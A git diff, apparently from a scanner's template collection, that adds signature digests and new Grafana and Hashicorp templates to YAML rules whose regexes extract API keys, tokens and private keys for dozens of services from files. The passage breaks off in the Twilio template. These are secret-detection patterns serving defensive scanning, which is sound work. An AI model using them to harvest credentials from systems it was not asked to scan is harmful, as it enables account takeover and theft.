4a0a0047304502202462ded229ee868d817211c6840458cf19ac6d2d28e23e16e0593cf3390728a1022100f118bf64b0f5d3821a01cf1d0d244c96a2f9835dd5b3fb5acfc3a1bc0dedb074:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/google/google-oauth-clientsecret.yaml b/file/keys/google/google-oauth-clientsecret.yaml index 97060e0cc4..c04ee93606 100644 --- a/file/keys/google/google-oauth-clientsecret.yaml +++ b/file/keys/google/google-oauth-clientsecret.yaml @@ -9,7 +9,6 @@ info: metadata: verified: true tags: google,token,file - file: - extensions: - all @@ -18,4 +17,6 @@ file: - type: regex part: body regex: - - '(GOCSPX-[a-zA-Z0-9_-]{28})' \ No newline at end of file + - '(GOCSPX-[a-zA-Z0-9_-]{28})' + +# digest: 4b0a00483046022100c79c4bbdc5435ff7938ac7699bfd027a11d77e2d9eb70024201ae4738f1b6ca4022100fed24c3c51b7103297ae1b73137db2a801cd76d1c1ded24ad3ffc132ec39f3b4:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/grafana/grafana-api-key.yaml b/file/keys/grafana/grafana-api-key.yaml new file mode 100644 index 0000000000..ffdc8c0945 --- /dev/null +++ b/file/keys/grafana/grafana-api-key.yaml @@ -0,0 +1,23 @@ +id: grafana-api-key + +info: + name: Grafana API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.go + metadata: + verified: true + tags: grafana,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022100f94f26615c01ee3669910469b31e0011b160852246ed76ae9802f34d6be1911c022076cd3f3e6b5257f59db3fb098baf801c44b0a628196d408b70d1765bb646a7c9:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/grafana/grafana-cloud-api-token.yaml b/file/keys/grafana/grafana-cloud-api-token.yaml new file mode 100644 index 0000000000..89714db424 --- /dev/null +++ b/file/keys/grafana/grafana-cloud-api-token.yaml @@ -0,0 +1,23 @@ +id: grafana-cloud-api-token + +info: + name: Grafana Cloud API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.go + metadata: + verified: true + tags: grafana,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022100ac8747d010f2f8ecbbf15e54c1a4f79e1e965927e8077c7e25d72c003adf0d9a02205ec44b2c0ae24af123d96ec3b31d842f77287892e7f1f5a92d08a213dd5af080:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/grafana/grafana-service-account-token.yaml b/file/keys/grafana/grafana-service-account-token.yaml new file mode 100644 index 0000000000..d965ba8338 --- /dev/null +++ b/file/keys/grafana/grafana-service-account-token.yaml @@ -0,0 +1,23 @@ +id: grafana-service-account-token + +info: + name: Grafana Service Account Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.go + metadata: + verified: true + tags: grafana,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4b0a00483046022100d0d2caaae6ee74a09fb5d24db235ba021d75800eafa6dbc83777ac9213de0eff022100f4dde19703abd7a8925d6b3dbcfa20ac5d7e72e6f670baed1ea04e57e3fdfd5a:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/hashicorp-api-token.yaml b/file/keys/hashicorp-api-token.yaml new file mode 100644 index 0000000000..011b0c7004 --- /dev/null +++ b/file/keys/hashicorp-api-token.yaml @@ -0,0 +1,23 @@ +id: hashicorp-api-token + +info: + name: Hashicorp API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.go + metadata: + verified: true + tags: hashicorp,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)[a-z0-9]{14}\.atlasv1\.[a-z0-9\-_=]{60,70} + +# digest: 490a004630440220077946f13881a3f72dcf81af66d6441c54bcfa9ebf55bb2a9b9b8e16ca48f82c022071b09b7aa278782ba81b70d8da7eed2b6876da0e551fc1a23533e1d67f4cce02:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/heroku-key.yaml b/file/keys/heroku-key.yaml index 40116fa08f..536535734e 100644 --- a/file/keys/heroku-key.yaml +++ b/file/keys/heroku-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: heroku,token,file - file: - extensions: - all @@ -19,4 +18,6 @@ file: - type: regex part: body regex: - - '(?i)heroku.{0,20}key.{0,20}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b' \ No newline at end of file + - '(?i)heroku.{0,20}key.{0,20}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b' + +# digest: 490a004630440220322c589eda4ae71a5afcc03f8474cfa44ec4b8add739e536850da07fb29a3ba7022040e633451e2dbb299a31a06233c0a586ca028148d47d09045dc24213ecbc8318:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/jenkins-token.yaml b/file/keys/jenkins-token.yaml index 53ce0dcc29..a7c5e78fd6 100644 --- a/file/keys/jenkins-token.yaml +++ b/file/keys/jenkins-token.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: jenkins,crumb,token,file - file: - extensions: - all @@ -20,4 +19,6 @@ file: - type: regex part: body regex: - - '(?i)jenkins.{0,10}(?:crumb)?.{0,10}\b([0-9a-f]{32,36})\b' \ No newline at end of file + - '(?i)jenkins.{0,10}(?:crumb)?.{0,10}\b([0-9a-f]{32,36})\b' + +# digest: 490a0046304402206708fb9e4ce9526d751a237961512de921fb4b6fbf2dfcdf4cd8c87a295d880802203513bf4ae00294fa6f3b20c462baeac93502f03f9014d3a4bf6e58a3f6a7a672:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/linkedin-id.yaml b/file/keys/linkedin-id.yaml index 209dcb4d6e..5f071d9886 100644 --- a/file/keys/linkedin-id.yaml +++ b/file/keys/linkedin-id.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: low tags: token,file,linkedin - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}" + +# digest: 490a00463044022078efc271f994d940d572f2765c646841073744668575736463509bbf802e9e6a0220734aaec7a05ce0875b02ec492d59834ab51db727c5309ad7dcd7c5f2273be481:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/mailchimp-api.yaml b/file/keys/mailchimp-api.yaml index 7e5a4bad37..09657f0502 100644 --- a/file/keys/mailchimp-api.yaml +++ b/file/keys/mailchimp-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,mailchimp - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "[0-9a-f]{32}-us[0-9]{1,2}" + +# digest: 4a0a00473045022044dc0414ef16f4cc2e54af8fb429d909233c3da5b9930d856d2d3a07caf5c184022100b714c99dcc1a53d01e2e20070ed6b094b841d629c949e98cef1ee1b382b8b1a4:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/mailgun-api.yaml b/file/keys/mailgun-api.yaml index ec96ecfed8..0c3db4d856 100644 --- a/file/keys/mailgun-api.yaml +++ b/file/keys/mailgun-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,mailgun - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "key-[0-9a-zA-Z]{32}" + +# digest: 4a0a00473045022100d1400353de6af71a602908816db1e3f13148cd04a694f42af9b6b25a1099d8b402201aec613457a1a345d88d8c3151b6bc3256571fa527c5fc0819794ad3d5f5640d:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/mapbox-token.yaml b/file/keys/mapbox-token.yaml index 633d69f111..dd5c6d2670 100644 --- a/file/keys/mapbox-token.yaml +++ b/file/keys/mapbox-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: token,file,mapbox - file: - extensions: - all @@ -27,3 +26,5 @@ file: part: body regex: - 'sk\.eyJ1Ijoi\w+\.[\w-]*' + +# digest: 490a004630440220083ab737af3fda5a7a447cb563d462ca4b3733f87e6a666e0e05d71d98a973b60220662f4f7b012f4cdb134a8fcd8a7102f0b5cfdcd1ac809fa2c1dc628d3445d874:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/newrelic/newrelic-pixie-apikey.yaml b/file/keys/newrelic/newrelic-pixie-apikey.yaml index 34de703a9b..d6b0a88f2e 100644 --- a/file/keys/newrelic/newrelic-pixie-apikey.yaml +++ b/file/keys/newrelic/newrelic-pixie-apikey.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: newrelic,pixie,token,file - file: - extensions: - all @@ -19,4 +18,6 @@ file: - type: regex part: body regex: - - "(px-api-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" \ No newline at end of file + - "(px-api-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" + +# digest: 490a004630440220138390f1f4e2d1e57a983f7b3d136f2e9bd3300f596b7a6921e416cf0188d82c02201875a9ab09e0e0c4cbed59719ab1f574e950983e80965fbaf8a52e263108b366:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/newrelic/newrelic-pixie-deploykey.yaml b/file/keys/newrelic/newrelic-pixie-deploykey.yaml index 07739f6da5..efa75eb263 100644 --- a/file/keys/newrelic/newrelic-pixie-deploykey.yaml +++ b/file/keys/newrelic/newrelic-pixie-deploykey.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: newrelic,pixie,token,file - file: - extensions: - all @@ -19,4 +18,6 @@ file: - type: regex part: body regex: - - "(px-dep-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" \ No newline at end of file + - "(px-dep-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" + +# digest: 4a0a00473045022100d55a40e2628a5a4d9dd6de44f5bbe2a4cfc519539a055f6e00f835aa4b1c6e5002206d2e91464a86e6ad005073e160277b975d7e93bc2a077cc5964d1f62a09baf99:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/npm-accesstoken.yaml b/file/keys/npm-accesstoken.yaml index 5aa0837544..25acd53f1f 100644 --- a/file/keys/npm-accesstoken.yaml +++ b/file/keys/npm-accesstoken.yaml @@ -12,7 +12,6 @@ info: metadata: verified: true tags: npm,token,file - file: - extensions: - all @@ -21,4 +20,6 @@ file: - type: regex part: body regex: - - "(npm_[A-Za-z0-9]{36})" \ No newline at end of file + - "\b(npm_[A-Za-z0-9]{36})\b" + +# digest: 4b0a0048304602210085a826c300dbd8f8492d5a4e7f4d659abc2e05fbac22cf7d2feed7c7d2a5ef1f022100d23b491409d29378ed54c21f453b93eae00823024185f3f1f884f9a55f53b188:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/nuget-key.yaml b/file/keys/nuget-key.yaml index 967058a894..d2d62934a5 100644 --- a/file/keys/nuget-key.yaml +++ b/file/keys/nuget-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: nuget,token,file - file: - extensions: - all @@ -19,4 +18,6 @@ file: - type: regex part: body regex: - - "(oy2[a-z0-9]{43})" \ No newline at end of file + - "(oy2[a-z0-9]{43})" + +# digest: 490a0046304402201cca19e9672d81e956c071dfb9a4b4895ed252657bec40c9c869aa22cc38a25a02202e4b29661e0b0c38522d2dab759ab209b35dda32b1d83853d874d4cf3439a908:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/openai-key.yaml b/file/keys/openai-key.yaml index d17cb539db..cbf3694c31 100644 --- a/file/keys/openai-key.yaml +++ b/file/keys/openai-key.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: openai,token,file - file: - extensions: - all @@ -20,4 +19,6 @@ file: - type: regex part: body regex: - - "(sk-[a-zA-Z0-9]{48})" \ No newline at end of file + - \b(sk-[a-zA-Z0-9]{48})\b + +# digest: 4b0a00483046022100f265aec70d23487919a384f6890a049a77a26205c996bfab3fc1754d98730bf2022100da734b764cf45071de6cad5c4a5e079438392ca276148bd96c1a3d5c3abc1ae6:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/paypal-braintree-token.yaml b/file/keys/paypal-braintree-token.yaml index 59dc3e8dbd..7b6e80e01e 100644 --- a/file/keys/paypal-braintree-token.yaml +++ b/file/keys/paypal-braintree-token.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,paypal - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" + +# digest: 4b0a00483046022100914fa8c94e14b34dcee4ae0999af373e7133288cd065c68c6e7c896ea6596ba2022100b7496af30b2264d69b60d8f9d420bb7d52294ed77bb7c762497b871053466a66:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/pictatic-api-key.yaml b/file/keys/pictatic-api-key.yaml index ec20f07569..41ea01a136 100644 --- a/file/keys/pictatic-api-key.yaml +++ b/file/keys/pictatic-api-key.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,6 @@ file: extractors: - type: regex regex: - - "sk_live_[0-9a-z]{32}" \ No newline at end of file + - "sk_live_[0-9a-z]{32}" + +# digest: 4a0a00473045022100d571fd7454b599f0a3ae00922d80dfadb02ac853b00328f07a4f5bd41a63d879022001109992bb9b44fcacba43a0f3f72b19a6ad1b5f7d3e4c00d20e80cd1ec0e4d8:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/postman-api-key.yaml b/file/keys/postman-api-key.yaml index 16949c29ad..66a78a2bf6 100644 --- a/file/keys/postman-api-key.yaml +++ b/file/keys/postman-api-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: postman,keys,file,token - file: - extensions: - all @@ -20,3 +19,5 @@ file: part: body regex: - '\b(PMAK-[a-zA-Z0-9]{24}-[a-zA-Z0-9]{34})\b' + +# digest: 4b0a00483046022100e158e3c9539a86553368be020b6a63e4d2d7383d5ebabfc763746408d78466c3022100dd689e22c94823f880d079b79edb861cfc02f9dd2118c70b8fc23efe6047c933:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/private-key.yaml b/file/keys/private-key.yaml index d1f6cd83f5..bc2ce2bb9d 100644 --- a/file/keys/private-key.yaml +++ b/file/keys/private-key.yaml @@ -5,7 +5,6 @@ info: author: gaurang,geeknik severity: high tags: token,file - file: - extensions: - all @@ -22,3 +21,5 @@ file: - "ssh-rsa" - "ssh-dsa" - "ssh-ed25519" + +# digest: 4a0a00473045022100afc79d8e6cbd26dc20df600f1c0b8b353f1046ad00d4843c634f0d5bc24fb83502207e1e7fc61bd7c4150d97ba55372fa650527b8670dc41f1ba6af88af97a7a0f29:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/pypi-token.yaml b/file/keys/pypi-token.yaml index c52a0343ae..cdc3ef1dbe 100644 --- a/file/keys/pypi-token.yaml +++ b/file/keys/pypi-token.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: pypi,token,file - file: - extensions: - all @@ -20,4 +19,6 @@ file: - type: regex part: body regex: - - "(pypi-AgEIcHlwaS5vcmc[a-zA-Z0-9_-]{50,})" \ No newline at end of file + - "(pypi-AgEIcHlwaS5vcmc[a-zA-Z0-9_-]{50,})" + +# digest: 4a0a004730450220195b9bb98994836e13e5ada60139caa821c791fb020369bb4154c165ac5f59fc022100edf23fe331923818fad26d47bd3318dde7eeedcfdf01bcbcb539ea5d74beeecc:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/razorpay-client-id.yaml b/file/keys/razorpay-client-id.yaml index 02e2a473b3..3c3165359b 100644 --- a/file/keys/razorpay-client-id.yaml +++ b/file/keys/razorpay-client-id.yaml @@ -8,7 +8,6 @@ info: - https://github.com/streaak/keyhacks#Razorpay-keys - https://docs.gitguardian.com/secrets-detection/detectors/specifics/razorpay_apikey tags: token,file,razorpay - file: - extensions: - all @@ -17,3 +16,5 @@ file: - type: regex regex: - "rzp_(live|test)_.{14}" + +# digest: 4a0a0047304502202b8c73cbfd9bf4ada16a913f97ef021fd3683720498b33b8463428d0a897ffa4022100b421aeefe0b04505ff11a652bd70aed6330bf80593756eb76cabcc0939c72936:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/rubygems-key.yaml b/file/keys/rubygems-key.yaml index 2f32147063..6fd748c2ef 100644 --- a/file/keys/rubygems-key.yaml +++ b/file/keys/rubygems-key.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: rubygems,token,file,ruby - file: - extensions: - all @@ -20,4 +19,6 @@ file: - type: regex part: body regex: - - "(rubygems_[a-f0-9]{48})" \ No newline at end of file + - "(rubygems_[a-f0-9]{48})" + +# digest: 4a0a0047304502206804dba16a9156c2e84776917cf579bdacc4729b6fc94723ab200c634f3d8751022100b7d853bf9f1045288d851d47a6e91da194a5566069c62ee5fa7667873858710c:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/s3-bucket.yaml b/file/keys/s3-bucket.yaml index e51f559e8c..d542011f1c 100644 --- a/file/keys/s3-bucket.yaml +++ b/file/keys/s3-bucket.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: info tags: token,file,bucket - file: - extensions: - all @@ -18,3 +17,5 @@ file: - "[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)" - "//s3\\.amazonaws\\.com/[a-z0-9._-]+" - "//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+" + +# digest: 4a0a00473045022100b23c497ae4dd1fda00fd382b868f55618111dba8e8d6182aacae04b31862b13102202165998551fea5da9c88dc506c8b8cdbf90a78885e7f51c83b52f6c77bb7a9ae:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/sauce-access-token.yaml b/file/keys/sauce-access-token.yaml index 5d528c72cd..2a2e59de29 100644 --- a/file/keys/sauce-access-token.yaml +++ b/file/keys/sauce-access-token.yaml @@ -9,7 +9,6 @@ info: metadata: verified: true tags: sauce,token,file - file: - extensions: - all @@ -18,4 +17,6 @@ file: - type: regex part: body regex: - - '(?i)sauce.{0,50}\b([a-f0-9-]{36})\b' \ No newline at end of file + - '(?i)sauce.{0,50}\b([a-f0-9-]{36})\b' + +# digest: 4a0a00473045022055a8cdd15ac14619e04d4141dc8b621519f52f23c6f9297b113ceb62e9f301e7022100fe5834c0417a46e47f93e8d5246d290fe380051e573c4dd0d2fd72b7c951507c:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/segment-public-api.yaml b/file/keys/segment-public-api.yaml index 4d4ae189f7..3bb96aeace 100644 --- a/file/keys/segment-public-api.yaml +++ b/file/keys/segment-public-api.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: segment,token,file - file: - extensions: - all @@ -20,4 +19,6 @@ file: - type: regex part: body regex: - - '(sgp_[a-zA-Z0-9]{64})' \ No newline at end of file + - '(sgp_[a-zA-Z0-9]{64})' + +# digest: 4a0a0047304502210080b994470dc6ce55181bcc606342b0dd731280fd6b63106a2f7929cee4d4338d02202342426ec6f3d9d67ace789fe8718e49219d1e745933b0b03d79be867f68e37b:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/sendgrid-api.yaml b/file/keys/sendgrid-api.yaml index 000c4516ea..f8d5d81271 100644 --- a/file/keys/sendgrid-api.yaml +++ b/file/keys/sendgrid-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,sendgrid - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" + +# digest: 4a0a00473045022100db3f9a4cb5ada6fcbe3bd6a463777cce68b4be7280b1525801bb93a81b89202602207901c7654fe5318ee02a07a99fee9560c2c840e9232933e9c4f49c5f7c7ea0a0:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/shopify-custom-token.yaml b/file/keys/shopify-custom-token.yaml index fbdd23d61d..633272cb11 100644 --- a/file/keys/shopify-custom-token.yaml +++ b/file/keys/shopify-custom-token.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,6 @@ file: extractors: - type: regex regex: - - "shpca_[a-fA-F0-9]{32}" \ No newline at end of file + - "shpca_[a-fA-F0-9]{32}" + +# digest: 4a0a0047304502210085cd88656755b775f99770cb88c5da1f824dcec1b1618d4c1a87291575b046d8022054ddaf06e10f38ef54b62d398ee3814629cb7e97fdbf58de7744fcdd1bc7c611:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/shopify-private-token.yaml b/file/keys/shopify-private-token.yaml index 7e308d71f9..bd7661b886 100644 --- a/file/keys/shopify-private-token.yaml +++ b/file/keys/shopify-private-token.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,6 @@ file: extractors: - type: regex regex: - - "shppa_[a-fA-F0-9]{32}" \ No newline at end of file + - "shppa_[a-fA-F0-9]{32}" + +# digest: 4a0a00473045022100a9be020541f7a37dd6e6656f9b67a9b0442ea70165319513ba08e1634e671f9402204d204366be0afb3f9811dcfefced9824ae43e1c1a4aec775fc11f0a6a97ecc86:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/shopify-public-access.yaml b/file/keys/shopify-public-access.yaml index fef350f2d1..8f1fd3c6a0 100644 --- a/file/keys/shopify-public-access.yaml +++ b/file/keys/shopify-public-access.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: shopify,token,file - file: - extensions: - all @@ -20,4 +19,6 @@ file: - type: regex part: body regex: - - '\b(shpat_[a-fA-F0-9]{32})\b' \ No newline at end of file + - '\b(shpat_[a-fA-F0-9]{32})\b' + +# digest: 4a0a004730450220257ad95370319c0d008a9783c239ede69a7db0786f2894e4941ad04e7c3cbd3f0221009b6e12360111642674fd144dc43954375b3c8ec894a0b981dd0d9dfe078ac916:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/shopify-shared-secret.yaml b/file/keys/shopify-shared-secret.yaml index 8121c35d82..5385f63e94 100644 --- a/file/keys/shopify-shared-secret.yaml +++ b/file/keys/shopify-shared-secret.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,6 @@ file: extractors: - type: regex regex: - - "shpss_[a-fA-F0-9]{32}" \ No newline at end of file + - "shpss_[a-fA-F0-9]{32}" + +# digest: 4a0a0047304502210099566422ba346d7c088c966e201131b5203ac2ca9536c433af790ce2b9bb890802207465a09fc96c5071e43e45f32e684d5b0661775fc6072619e0e7c6a5175c013c:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/shopify-token.yaml b/file/keys/shopify-token.yaml index a60878623e..2ca1c829f5 100644 --- a/file/keys/shopify-token.yaml +++ b/file/keys/shopify-token.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,6 @@ file: extractors: - type: regex regex: - - "shpat_[a-fA-F0-9]{32}" \ No newline at end of file + - "shpat_[a-fA-F0-9]{32}" + +# digest: 4a0a004730450220735ac33f0be084e65fa83ca3b8a64d89bc6a2b0ab1fdeefa1ea47fcb1fdf58da022100f33970409c659f0402cede316b0589aa5e516958c357cf2f9e11e7691de31b9e:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/slack-api.yaml b/file/keys/slack-api.yaml index ea761c24d4..6f17ee55d5 100644 --- a/file/keys/slack-api.yaml +++ b/file/keys/slack-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,slack - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "xox[baprs]-([0-9a-zA-Z]{10,48})?" + +# digest: 4b0a00483046022100ba3776e008af0a4e7848a73adf72eb7a16913a260d81182aeac50bc9d167c3d3022100d24a73474fbec04e1368b575900583a20922f4cc0fc702c636f53651fc17f939:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/slack-webhook.yaml b/file/keys/slack-webhook.yaml index 97548ae165..c44af0fefa 100644 --- a/file/keys/slack-webhook.yaml +++ b/file/keys/slack-webhook.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,slack - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" + +# digest: 4a0a0047304502206557ca925847e608d57b3a0bac581a2f51d85421f88fec1579e5cef728feabc8022100f97bae693d3bdf94877bac3c5e53bec9765196113fa213567d0ae28ec092a819:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/square-access-token.yaml b/file/keys/square-access-token.yaml index 5601c992e7..185bedae17 100644 --- a/file/keys/square-access-token.yaml +++ b/file/keys/square-access-token.yaml @@ -5,7 +5,6 @@ info: author: gaurang,daffainfo severity: high tags: token,file,square - file: - extensions: - all @@ -15,3 +14,5 @@ file: regex: - "EAAAE[a-zA-Z0-9_-]{59}" - "sq0atp-[0-9A-Za-z\\-_]{22}" + +# digest: 4a0a004730450221009281991f9e1715dea07ec0b922c582007cc3d39d19c467aecfa8d5c367d7fe4202204c23bcb43bfc14965e1be0cb25c65d889c7e95691b0dc00d2f10b042a0a13942:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/square-oauth-secret.yaml b/file/keys/square-oauth-secret.yaml index 15571e71bc..bc2af245f7 100644 --- a/file/keys/square-oauth-secret.yaml +++ b/file/keys/square-oauth-secret.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,square - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "sq0csp-[0-9A-Za-z\\-_]{43}" + +# digest: 4b0a0048304602210094447bdda0f382fd6d106327c68978069703b7a6badc13ee1eec51b1d3e94255022100d9d1b480cc1490519e67780e416e6079a30ac865b1e57c0cb49175a2fc04ff29:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/stackhawk-api-key.yaml b/file/keys/stackhawk-api-key.yaml index fd8c124055..0f1688cec2 100644 --- a/file/keys/stackhawk-api-key.yaml +++ b/file/keys/stackhawk-api-key.yaml @@ -9,7 +9,6 @@ info: metadata: verified: true tags: token,file - file: - extensions: - all @@ -18,3 +17,5 @@ file: - type: regex regex: - "hawk\\.[0-9A-Za-z\\-_]{20}\\.[0-9A-Za-z\\-_]{20}" + +# digest: 4b0a00483046022100b4a0f7ece8b51f8686bf0d593526edd0dd5f2c3df30b8ce70034521bd4981fd4022100f41b61c61d8704d8886b2625a00ebc51bf5876da8263394a59006dc026acf9d9:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/stripe-api-key.yaml b/file/keys/stripe-api-key.yaml index d65411c71f..a5ea66caf7 100644 --- a/file/keys/stripe-api-key.yaml +++ b/file/keys/stripe-api-key.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,stripe - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" + +# digest: 4b0a00483046022100f0e284415d4e8014de7c3e8cfdf980c900fd56a840ea195cffecec856505187302210097d3c6810ed01c45e33ddcd46998419fda6972b412edda34ce8ff9ed4fa6384b:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/telegram-token.yaml b/file/keys/telegram-token.yaml index 91a3b6d135..9ab9575668 100644 --- a/file/keys/telegram-token.yaml +++ b/file/keys/telegram-token.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: telegram,token,file - file: - extensions: - all @@ -20,4 +19,6 @@ file: - type: regex part: body regex: - - '\b(\d+:AA[a-zA-Z0-9_-]{32,33})' \ No newline at end of file + - '\b(\d+:AA[a-zA-Z0-9_-]{32,33})' + +# digest: 4b0a0048304602210094e7fcb79a5cc5bdac1a5fac7e89e0a722b45b7da2750cfc307bd6bd1e143095022100f5d38618b57c67c4bafbd50c31cd4b843ca49854aaadb6d0c5a35ff82f616965:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/twilio-api.yaml b/file/keys/twilio-api.yaml index 9895746a8a..94674dffe2 100644 --- a/file/keys/twilio-api.yaml +++ b/file/keys/twilio-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,6 @@ file: extractors: - type: regex regex: - - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" \ No newline at end of file + - 